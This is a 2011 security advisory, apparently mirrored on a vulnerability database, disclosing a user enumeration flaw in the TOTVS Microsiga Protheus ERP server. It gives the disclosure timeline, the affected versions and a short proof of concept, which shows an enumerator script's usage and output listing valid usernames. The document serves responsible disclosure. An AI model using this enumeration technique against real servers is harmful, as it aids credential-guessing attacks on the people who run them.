Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25885
HistoryMar 09, 2011 - 12:00 a.m.

[DCA-2011-0002]: TOTVS ERP Microsiga Protheus - Users Enumeration

2011-03-0900:00:00
vulners.com
48
JSON

[DCA-2011-0002]

[Discussion]

  • DcLabs Security Research Group advises about following vulnerability(ies):

[Software]

  • TOTVS ERP Microsiga Protheus

[Vendor Product Description - Portuguese]

  • Software de Gestão - TOTVS
    A TOTVS é uma empresa de software, inovação, relacionamento e suporte
    à gestão, líder absoluta no Brasil, com 49,1% de share de mercado, e
    também na América Latina, com 31,2%*, é a maior empresa de softwares
    aplicativos sediada em países emergentes e a 7ª maior do mundo no
    setor.Tem mais de 25,2 mil clientes ativos, conta com o apoio de 9 mil
    participantes e está presente em 23 países.
    Proposta de Valor
    Tornar a empresa mais competitiva, com maior velocidade de decisão,
    oferecendo soluções que organizam, disciplinam, definem e impõem
    processos, armazenam dados, geram informação e auxiliam a gestão.
  • Fonte: http://totvs.com.br/web/guest/software

[Advisory Timeline]

  • 02/Feb/2011 -> Initial contact to vendor, security contact request.
  • 03/Feb/2011 -> Security contact response.
  • 03/Feb/2011 -> First notification sent, release date set to March 01, 2011.
  • 04/Feb/2011 -> Vendor confirms notification received.
  • 21/Feb/2011 -> Situation report requested.
  • 01/Mar/2011 -> No vendor response.
  • 02/Mar/2011 -> Advisory published.

[Bug Summary]

  • Users enumeration

[Impact]

  • Low

[Affected Version]

  • Microsiga Protheus 8 (20081215030344)
  • Microsiga Protheus 10 (20100812040605)
  • Other versions can also be affected but weren't tested.

[Bug Description and Proof of Concept]

  • The server validates the user before asking for a password, thus we
    can keep trying usernames until we get a password prompt.

  • A Proof of Concept has been created:

— command line output begin —
[waKKu@localhost: codes] # ./totvs_users_enumerator.py -h
usage: totvs_users_enumerator.py [options] [filename]
-h for help

options:
–version show program's version number and exit
-h, --help show this help message and exit
-i IPADDRESS, --ipaddress=IPADDRESS
Server IP address
-p PORT, --port=PORT Port number (defaults to 1234)
-t TARGET, --target=TARGET
Target Version: 8 -> Protheus 8 | 10 -> Protheus 10.
Defaults to 10

[waKKu@localhost: codes] # ./totvs_users_enumerator.py --target 10
–ipaddress 192.168.4.95 userlist
Valid user: admin
Invalid user: fakeuser
Invalid user: nobody
Valid user: jonas
Valid user: fernando
Invalid user: elvis
— command line output end —

All flaws described here were discovered and researched by:
Flávio do Carmo Júnior aka waKKu.
DcLabs Security Research Group
carmo.flavio <AT> dclabs <DOT> com <DOT> br

[Workarounds]

  • An initial workaround was provided to block user after 3 failed
    password attempts, but it doesn't work against this kind of users
    enumeration.

[Credits]
DcLabs Security Research Group.

Atenciosamente,

Flávio do Carmo Júnior aka waKKu @ DcLabs
Florianópolis/SC
http://br.linkedin.com/in/carmoflavio
http://0xcd80.wordpress.com

JSON